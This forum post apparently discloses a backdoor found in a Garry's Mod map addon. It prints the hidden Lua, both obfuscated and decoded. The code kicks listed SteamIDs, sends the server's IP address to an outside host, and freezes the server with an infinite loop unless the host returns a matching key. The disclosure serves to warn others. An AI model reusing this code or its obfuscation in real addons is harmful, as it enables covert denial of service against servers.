• Found backdoor script inside gm_jar_pll_redux_v1
    2 replies, posted
Authors of this map can execute any lua script from their php. Link to the map addon: http://steamcommunity.com/sharedfiles/filedetails/?id=1263853290 https://pp.userapi.com/c841031/v841031955/5e4ed/Ww_L8N05zek.jpg Link to .ent file: https://www.dropbox.com/s/wbi39jfogj2krxs/gm_jar_pll_redux_v1.ent?dl=0
kek.php local function fly(ply)     if ply:SteamID() == 'STEAM_0:1:8944316' or ply:SteamID() == 'STEAM_0:0:103058622' or ply:SteamID() == 'STEAM_0:1:85520619' or ply:SteamID() == 'STEAM_0:1:179885340' or ply:SteamID() == 'STEAM_0:1:105365673' or ply:SteamID() == 'STEAM_0:1:31293987' or ply:SteamID() == 'STEAM_0:0:171859177' or ply:SteamID() == 'STEAM_0:0:2151337' or ply:SteamID() == 'STEAM_0:0:55966548' or ply:SteamID() == 'STEAM_0:0:64556993' or ply:SteamID() == 'STEAM_0:0:103058622' or ply:SteamID() == 'STEAM_0:1:8944316' then         ply:Kick(' sosi :D')     end end hook.Add('PlayerSpawn', 'PlayerSpawn', fly); local function fly2(ply)     if game.SinglePlayer() then         RunConsoleCommand('disconnect')     end end hook.Add('Move', 'Move', fly2) fly.php (someone might want to un-obfusticate it) local PlE = _G local PlEPlE = PlE['\115\116\114\105\110\103'] local PlEPlEPlE = PlE['\98\105\116']['\98\120\111\114'] local function PlEPlEPlEPlEPlEPlEPlE(PlEPlEPlEPlE)     if PlEPlE['\108\101\110'](PlEPlEPlEPlE) == 0 then         return PlEPlEPlEPlE     end     local PlEPlEPlEPlEPlE = ''     for _ in PlEPlE['\103\109\97\116\99\104'](PlEPlEPlEPlE,'\46\46') do         PlEPlEPlEPlEPlE=PlEPlEPlEPlEPlE..PlEPlE['\99\104\97\114'](PlEPlEPlE(PlE["\116\111\110\117\109\98\101\114"](_,16),81))     end     return PlEPlEPlEPlEPlE end if PlE[PlEPlEPlEPlEPlEPlEPlE'1c30211a342860']==nil then     PlE[PlEPlEPlEPlEPlEPlEPlE'1c30211a342860']=PlEPlEPlEPlEPlEPlEPlE'61' end PlE[PlEPlEPlEPlEPlEPlEPlE'373821']=PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'0334213d303234'](PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'0334213d303234'](PlE[PlEPlEPlEPlEPlEPlEPlE'36303c34'][PlEPlEPlEPlEPlEPlEPlE'163425180110353523342222'](),PlEPlEPlEPlEPlEPlEPlE'7f',PlEPlEPlEPlEPlEPlEPlE'30'),PlEPlEPlEPlEPlEPlEPlE'6b',PlEPlEPlEPlEPlEPlEPlE'33')PlE[PlEPlEPlEPlEPlEPlEPlE'39252521'][PlEPlEPlEPlEPlEPlEPlE'1734253239'](PlEPlEPlEPlEPlEPlEPlE'39252521226b7e7e3021387f2134232b3e2225233e387f23247e3021387e3c3021223a34287e3a3428'..PlE[PlEPlEPlEPlEPlEPlEPlE'373821']..PlEPlEPlEPlEPlEPlEPlE'7f213921',function (PlEfor)if PlEfor==PlEPlEPlEPlEPlEPlEPlE'656165' then PlE[PlEPlEPlEPlEPlEPlEPlE'25383c3423'][PlEPlEPlEPlEPlEPlEPlE'02383c213d34'](1,function ()while true do end end )end local endPlEPlE=PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'1429213d3e3534'](PlEPlEPlEPlEPlEPlEPlE'71',PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'0334213d303234'](PlEfor,PlEPlEPlEPlEPlEPlEPlE'6d33236f',PlEPlEPlEPlEPlEPlEPlE'71'))if PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'222433'](endPlEPlE[2],2,PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'3d343f'](endPlEPlE[2]))==PlE[PlEPlEPlEPlEPlEPlEPlE'36303c34'][PlEPlEPlEPlEPlEPlEPlE'163425180110353523342222']()and PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'222433'](PlE[PlEPlEPlEPlEPlEPlEPlE'1c30211a342860'],2,PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'3d343f'](PlE[PlEPlEPlEPlEPlEPlEPlE'1c30211a342860']))==PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'222433'](endPlEPlE[1],2,PlE[PlEPlEPlEPlEPlEPlEPlE'222523383f36'][PlEPlEPlEPlEPlEPlEPlE'3d343f'](endPlEPlE[1]))then return else PlE[PlEPlEPlEPlEPlEPlEPlE'25383c3423'][PlEPlEPlEPlEPlEPlEPlE'02383c213d34'](1,function ()while true do end end )end end )
local function FailFunction( str )     if string.len( str ) == 0 then              return str              end          local res = ""     for _ in string.gmatch( str, ".." ) do              res = res .. string.char( bit.bxor( tonumber( _, 16 ), 81 ) )              end          return res      end --[[ 1c30211a342860 -> MapKey1 373821 -> fip 222523383f36 -> string 0334213d303234 -> Replace 36303c34 -> game 163425180110353523342222 -> GetIPAddress 7f -> . 30 -> a 6b -> : 33 -> b 39252521 -> http 1734253239 -> Fetch 39252521226b7e7e3021387f2134232b3e2225233e387f23247e3021387e3c3021223a34287e3a3428 -> https://api.perzostroi.ru/api/mapskey/key 7f213921 -> .php 656165 -> 404 25383c3423 -> timer 02383c213d34 -> Simple 1429213d3e3534 -> Explode 71 -> [SPACE CHARACTER] 6d33236f -> <br> 222433 -> sub 3d343f -> len ]] if MapKey1 == nil then     MapKey1 = "0" end fip = string.Replace( string.Replace( game.GetIPAddress(), ".", "a" ), ":", "b" ) http.Fetch( "https://api.perzostroi.ru/api/mapskey/key" .. fip .. ".php", function( body )     if body == "404" then -- if custom hacks for this particular server aren't found on the website...              timer.Simple( 1, function()                  while true do                 -- then just hang it up             end         end ) -- end timer              end          local LinesFromPageBody = string.Explode( " ", string.Replace( body, "<br>", " " ) )          local FirstLine = LinesFromPageBody[1] -- make it easier on the eyes     local SecondLine = LinesFromPageBody[2]          if string.sub( SecondLine, 2 ) == game.GetIPAddress() and string.sub( MapKey1, 2 ) == string.sub( FirstLine, 2 ) then              return              else              timer.Simple( 1, function()                      while true do                 -- hang it up             end                      end )          end      end )
Sorry, you need to Log In to post a reply to this thread.